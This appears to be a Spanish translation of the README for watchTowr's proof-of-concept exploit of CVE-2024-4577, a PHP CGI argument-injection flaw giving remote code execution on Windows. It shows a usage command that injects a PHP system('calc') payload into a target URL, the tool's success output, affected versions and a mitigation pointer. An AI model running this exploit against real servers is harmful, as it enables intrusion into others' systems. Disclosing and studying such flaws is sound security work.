
PoC de ejecución remota de código por inyección de argumentos en PHP CGI (CVE-2024-4577)
Una prueba de concepto desarrollada por @watchTowr que explota la vulnerabilidad de inyección de argumentos en PHP CGI (CVE-2024-4577) para obtener RCE en una versión vulnerable de PHP que se ejecuta en un entorno Windows. Análisis técnico detallado de esta vulnerabilidad
Esta vulnerabilidad fue encontrada por Orange Tsai (@orange_8361) de DEVCORE (@d3vc0r3). Asegúrate de seguir su excelente investigación; nuestro papel fue únicamente recrear y desarrollar el exploit para este problema.
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
según la publicación original del blog de DEVCORE (@d3vc0r3) Esta vulnerabilidad afecta a todas las versiones de PHP instaladas en el sistema operativo Windows:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
Dado que las ramas de PHP 8.0, PHP 7 y PHP 5 han llegado al final de su vida útil y ya no reciben mantenimiento, los administradores de servidores pueden consultar la sección "¿Soy vulnerable?" AQUÍ para encontrar recomendaciones de parches temporales en la sección "Medidas de mitigación".
Para conocer las últimas investigaciones de seguridad, sigue al equipo de watchTowr Labs